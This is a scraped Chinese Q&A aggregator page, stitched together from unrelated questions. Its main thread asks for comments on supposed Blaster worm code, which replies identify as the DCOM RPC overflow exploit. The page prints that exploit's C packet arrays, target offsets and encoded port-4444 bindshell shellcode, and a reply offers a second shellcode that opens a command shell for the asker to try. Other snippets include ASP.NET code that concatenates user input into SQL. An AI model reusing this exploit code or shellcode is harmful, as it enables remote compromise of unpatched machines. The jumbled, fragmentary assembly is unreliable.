谁帮我分析(注释)下冲击波源代码。。注明个段代码的功能。它是用什么语言写的?我有C、C#编程基础)
final JScrollPane scrollPane = new JScrollPane();
getContentPane().add(scrollPane, BorderLayout.CENTER);//把scrollPane加入到主pane中并设置布局为居中
textArea = new JTextArea(); //新建一个多行文本框
scrollPane.setViewportView(textArea); //给多行文本框加一个视图
setSize(573,370); //窗体的大小设置
setVisible(true); //窗体可见
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); //窗体右上角的关闭按扭
}
//一个方法设置多行文体框的字体
public void setTextFont(Font f){
textArea.setFont(f);
}
public static void main(String[] args) {
note = new MyNote();
}
}
你的这段代码没有全部写出来。
学的不好的话,不要
getContentPane().add(scrollPane, BorderLayout.CENTER);写出这样的句子,建议分开写。如果能很好的理解以后可以这样写。
protectedvoidPage_Load(objectsender,EventArgse)
{
if(!IsPostBack)
{
GetInfo();
}
}
前面这段程序是页面加载的程序 ,加载过程中如果不是通过后退按钮加载的,那么调用Getinfo函数来显示有关信息。
下面这段程序就是Getinfo函数,用来查询数据库并且显示有关信息。
publicvoidGetInfo()
{
intid =int.Parse(Request.QueryString["id"].ToString());这行是获取用户的id号
SqlDataReader dr;定义查询变量
dr = data.GetDataReader("select * from V_St_T_LunWen where id="+ id);这是查询数据库
dr.Read();这里获取数据
下面8条语句分别显示有关信息,从字面意思看,应该是论文信息,tostring是系统方法,用来返回字符串以便显示。
Hidden1.Value = dr["LunWenId"].ToString();
Hidden2.Value = dr["StId"].ToString();
txtTitle.Text = dr["LunWenName"].ToString();
txtlunwenInfo.Text = dr["lunwen"].ToString();
Label1.Text = dr["IsChk"].ToString();
TextBox1.Text = dr["StName"].ToString();
TextBox2.Text = dr["PingShen"].ToString();
TextBox3.Text = dr["ChengJi"].ToString();
}
下面这段程序应该是“评审通过”或者类似的功能,把评分保存到数据库中。
protectedvoidButton1_Click(objectsender,EventArgse)
{
intid =int.Parse(Request.QueryString["id"].ToString());
data.RunSql("update St_lunwen set PingShen='"+ TextBox2.Text +"',ChengJi='"+ TextBox3.Text +"' where id="+ id);这句很重要,通过数据库操作把分数保存到数据库
Alert.AlertAndRedirect("评审成功","FileList.aspx");这里给出提示信息
}
}
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
#i nclude
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char *targets [] =
{
"Windows NT SP4 (english)",
"Windows NT SP5 (chineese)",
"Windows NT SP6 (chineese)",
"Windows NT SP6a (chineese)",
"Windows 2000 NOSP (polish)",
"Windows 2000 SP3 (polish)",
"Windows 2000 SP4 (spanish)",
"Windows 2000 NOSP1 (english)",
"Windows 2000 NOSP2 (english)",
"Windows 2000 SP2-1 (english)",
"Windows 2000 SP2-2 (english)",
"Windows 2000 SP3-2 (english)",
"Windows 2000 NOSP (chineese)",
"Windows 2000 SP1 (chineese)",
"Windows 2000 SP2 (chineese)",
"Windows 2000 SP3 (chineese)",
"Windows 2000 SP4 (chineese)",
"Windows 2000 SP3 (german)",
"Windows 2000 NOSP (japaneese",
"Windows 2000 SP1 (japaneese)",
"Windows 2000 SP2 (japaneese)",
"Windows 2000 NOSP (korean)",
"Windows 2000 SP1 (korean)",
"Windows 2000 SP2 (korean)",
"Windows 2000 NOSP (mexican)",
"Windows 2000 SP1 (mexican)",
"Windows XP NOSP (english)",
"Windows SP1-2 (english)",
"Windows 2k3 (english)",
"Windows 2000 SP3 (german)",
"Windows 2000 SP4-1 (german)",
"Windows 2000 SP4-2 (german)",
"Windows XP SP1 (german)",
"Windows 2000 SERVER SP1 (french)",
"Windows 2000 SERVER SP4 (french)",
"Windows XP NOSP (french)",
"Windows XP SP1 (french)",
"Windows 2000 SP0 (english)",
"Windows 2000 SP1 (english)",
"Windows 2000 SP2 (english)",
"Windows 2000 SP3 (english)",
"Windows 2000 SP4 (english)",
"Windows XP SP0 (english)",
"Windows XP SP1-1 (english)",
"Windows XP SP2 (english)",
"Windows 2000 Advanced Server SP3 (english)",
"ALL/WINXP/WIN2K",
NULL
};
unsigned long offsets [] =
{
0x77e527f3,
0x77cfdaee,
0x77ac0ef0,
0x77c3eaf0,
0x774d3fe3,
0x77292ce4,
0x77133ba5,
0x777416e8,
0x772b49e2,
0x77b524e8,
0x775cfa2e,
0x772ae3e2,
0x778b89e6,
0x772b49e0,
0x77444342,
0x77294cdf,
0x777a882e,
0x77e527f3,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e8,
0x77e3afe9,
0x77db37d7,
0x77b05422,
0x77292ce3,
0x77294ce0,
0x7756c2e2,
0x77fc18d4,
0x774b3ee4,
0x7756c2e2,
0x774a75d4,
0x77fc18d4,
0x77e81674,
0x77e829ec,
0x77e824b5,
0x77e8367a,
0x77f92a9b,
0x77e9afe3,
0x77e626ba,
0x77d737db,
0x77e2afc5,
0x010016C6
};
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff" /* return address */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
呵呵,这个不是冲击波的代码
只是当年冲击波所利用的那个rpc溢出漏洞的exploit而已,楼主见过哪个蠕虫还让用户来选择目标的os种类吗?
这个当然是用c编写的,被编码的东西叫做shellcode,是溢出后控制程序流程用的,可以理解为一些函数的代码,也就是你想让目标机器执行的指令
楼主想编写蠕虫吧,蠕虫一般是c和汇编结合来编写,只用汇编也可以,当然嵌入式开发效率要高,要知道蠕虫和杀毒软件拼的就是时间啊 :)
现在即使编译好了也不会有什么好的效果了,因为那个漏洞已经不是0day了,被补好了,没多大价值,现在毒客界流行arp病毒,irc-bot和p2p-bot
再就是你给出的代码是linux下利用的,看
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
这几个头文件就知道,在linux下用gcc编译吧,当然windows下用cygwin也可以模拟gcc编译的
这种代码在溢出攻击中称之为SHELLCODE,是用vc编写好攻击代码,然后按F10调试-->在DEBUG工具兰中点击最后一个按钮“DISASSEMBLE”出现原程序的汇编代码。再到代码窗口上点鼠标右建再弹出筐中选择‘CODE BYTES’就会出现上面类似的代码(实质是机器码)
在溢出后就可以执行这种机器代码。
unsigned char shellcode[] =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
"\xFF\xD0";这段SHELLCODE就是开DOS窗口的楼主可以尝试下!
C语言编写,好像是Linux平台下编译的通用版本
这些数组里装的是已经编译的程序的机器码,只是以十六进制的形式表示的而已,在使用时用于覆盖内存缓冲区溢出后的机器码,以使得这些指令得到执行.
不用注释了吧?就是加入一些头文件,然后声明两个数组而已。
应该是C吧。
谁能帮我分析下会计的现状,谢谢?
随着市场经济的发展,供不应求,素质也有待进一步提高.
请SEO高手帮我分析下我的网站,怎么样才能得到较高的排名!(200分)
(2)、搜索引擎登记状况分析 (3)、搜索引擎排名状况分析 (4)、交换链接相关性 (5)、网络营销主要方法分析 5、网站运营分析 (1)、网络投资分析 (2)、网站运营策略分析 二、网站优化 1、网站结构优化 网站导航、页面布局优化 2、网页标签优化 网页TITIEL关键词标签、网页简介标签,图片注释、...
求java大神 帮我分析一下我注释的地方为什么找不到东西,该怎么改_百 ...
注释被清除了??用了SSH框架??Tomcat服务器?如果是,可能是IDE,框架,服务器的兼容性问题,解决方法暂时不知。
谁帮我把下面这首词的正确注解翻译一下,尽量详细,谢谢!
因此古书的注解在解词释句之外,有的还解说章旨,分析篇章结构。尤其是东汉出现的章句体注释,在串讲文意中往往夹有对篇章结构的分析,并且每章之后有“章旨”来点明此章的主要内容。例如:孟子见梁惠王。王曰:“叟不远千里而来,亦将有以利吾国乎?”孟子对曰:“王何必曰利?亦有仁义而已矣。
请各位帮我注释一下 谢谢
这是什么啊,疯了。
这个是西部建设的股票,帮我分析下吧~跪谢!
最后附带一句重要的话,就我个人认为K线形态分析有2重点:1、K线理论的短线核心是“星线”——其占到K线形态理论的70~80%,抓住星线对做短线很重要。2、K线理论的长线核心是“几个字母”——V和A(塔型反转),W和M(双头型or头肩型反转)。【注释】分析K线形态,关键是揣摩市场心态:心态决定形态...
谁能帮我分析一下这个数据结构代码?希望能为关键句子都加上注释解释
void LevelOrder(BiTree bt, char *ss)\/* travel BiTree bt by level, Return result by ss. *\/ { int flag=0,i=0;Queue A; \/\/说明队列变量\/\/ QElemType e; \/\/动态分配 e\/\/ InitQueue(A); \/\/初始化建立空队列\/\/ e=bt; \/\/用e接收传进来的bt while(!QueueEmpty(A)...
谁能帮我查一下<<迎春乐>>的注释
首先,在家庭生活和夫妇感情上,一方面,她遵从那个时代社会的秩序和习俗,作为侧室她十分清楚自己地位,她有着极高的涵养、慈慧仁厚的宅心,她能上奉姑嫜,下恤奴婢,能与奕绘的正室妙华夫人相处融恰,真情相待。她气质醇雅高贵,能营造宁静安详和谐的家庭生活气氛,并享受家庭的快乐。另一方面,在夫妇感情生活中,她有不同...
请大家帮我注释一下
此句设置字体颜色 <% if request.cookies("memberid")<>"" then %> 如果cookies中memberid的值不为空,则将下面隐藏域input的value值为memberid <input name="memberid" type="hidden" id="memberid" value="<%=request.cookies("memberid")%>"> <% else %> 如果为空,value值为memberid...
哪位大神能帮我把这个程序注释一下,谢谢了!
Function Name : assert_failed 函数名称:断言失败(也可以翻为诊断错误)Description : Reports the name of the source file and the source line number 报告:描述的源文件的名称和源代码行数错误 where the assert error has occurred.再次诊断错误 Input : - file: pointer to the sourc...
壬鲁欣坤: #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude #i nclude unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x...
凌源市13556886177: 谁帮我把这段代码注释下??
壬鲁欣坤: 这段实际很简单,其实就是多个DIV层嵌套,每个DIV由CSS样式表控制布局或外观等. 由于没有详细的CSS样式表代码,确实没法解释... class的意思就是使用CSS样式表中定义的box样式,以下的所有DIV层中的class都是这个意思 <div ...
凌源市13556886177: c++代码实现模式转换怎么写,求各位大神帮下忙. - ?
壬鲁欣坤: { ... int mode = 0; scanf("%d", switch(mode) { case 2:系统随机输出十三张牌中的四...
凌源市13556886177: vc++新手 谁帮我注释下这段代码 每条语句是赶什么的 - ?
壬鲁欣坤: 你这是数据库的代码吧? // 把用户输入的数据保存到成员变量里,如下面你的m_strQuery UpdateData(); // 把字符串整理一下,比如去掉空格和其他空白字符 m_strQuery.TrimLeft(); // 判断用户是否输入了数据,没有输入的话提示他 if(m_...
凌源市13556886177: 哪个高手帮我看下这段JAVA代码啊,谢了,, - ?
壬鲁欣坤: import java.io.*; public class test { public static v...
凌源市13556886177: 谁能帮我分析一下下列C++代码? - ?
壬鲁欣坤: #include "SDL/include/SDL.h" //包含文件 #include "easyBoxHeader.h" //包含文件 int main( int argc, char* args[] ) //主函数的开始 { if( init() == false ) //如果init()返回false { return 1; //以失败退出 } if( SDL_Flip( screen ) == -1 ) //如果SDl_Flip...
凌源市13556886177: 请帮我注释下这段代码(每行注释下)!谢谢! - ?
壬鲁欣坤: <%@ page language="java" import="java.util.*" pageEncoding="ISO-8859-1"%> //这个是加载的选项,pageEncode是字符编码<%@ page import="java.sql.*" %><% String path = request.getContextPath();//得到页面上下文 String ...
凌源市13556886177: 送分:谁能帮我注释这段代码啊?VB.NET - ?
壬鲁欣坤: ("@Au_username", SqlDbType.VarChar, 50).Value = uid @Au_username: 给存贮过程中的 这个参数传值 SqlDbType.VarChar : 传值的类型,是SQL中@Au_username定义的类型,varchar50 : 是值的大小.uid : 是vB中需要给@Au_username赋值的变量